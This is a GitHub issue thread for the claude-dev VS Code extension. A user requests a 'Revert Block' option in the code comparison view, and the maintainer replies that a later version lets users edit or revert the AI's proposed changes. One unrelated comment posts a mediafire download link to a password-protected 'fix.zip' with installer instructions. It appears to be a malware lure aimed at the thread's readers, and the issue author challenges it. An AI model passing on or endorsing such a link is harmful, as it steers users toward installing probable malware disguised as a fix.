### ISSUE TITLE
FEATURE: Add "Revert Block" Option to Code Comparison Window

### ISSUE THREAD

**Issue by grabani** [saoudrizwan/claude-dev#176]
Claud-Dev's The CURRENT behaviour is:

When Claude-Dev presents a user with a file's modified code in a split screen the current design, as far as I can tell, only allows a person to see the changes and then essentially decide to save (accept) them ALL.

I propose that Claude-Dev uses VSCode's **NORMAL** behaviour when the `Compare Selected` option is used to compare two files. That is, the user is provided with a convenient **`Revert Block `** option in the UI which allows the user to override the proposed changes (see image below):

![image](https://github.com/user-attachments/assets/3d81d7c4-fd0e-4a32-a58d-4633ba3e3d58)

PS - Personally when I compare TWO files, where one is the newly prosed changes (e.g. from a LMM) for an `existing ` file, I select the **NEW** code file first and then the **ORIGINAL** that way I can update the **ORIGINAL** file with the proposed changes (see the image below).

![image](https://github.com/user-attachments/assets/bf33a76e-44cc-4683-9c18-a2ffcc74c78a)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by grabani** [comment]
who are you and what are you telling me to download?? Explain further.

**Comment by saoudrizwan** [comment]
v1.5.6 now let's you edit Claude's changes before accepting! When he edits or creates a file, you can modify his changes directly in the right side of the diff view. You can even hover over that 'Revert Block' arrow button in the center to undo `// rest of code here` shenanigans when he deletes a bunch of code.
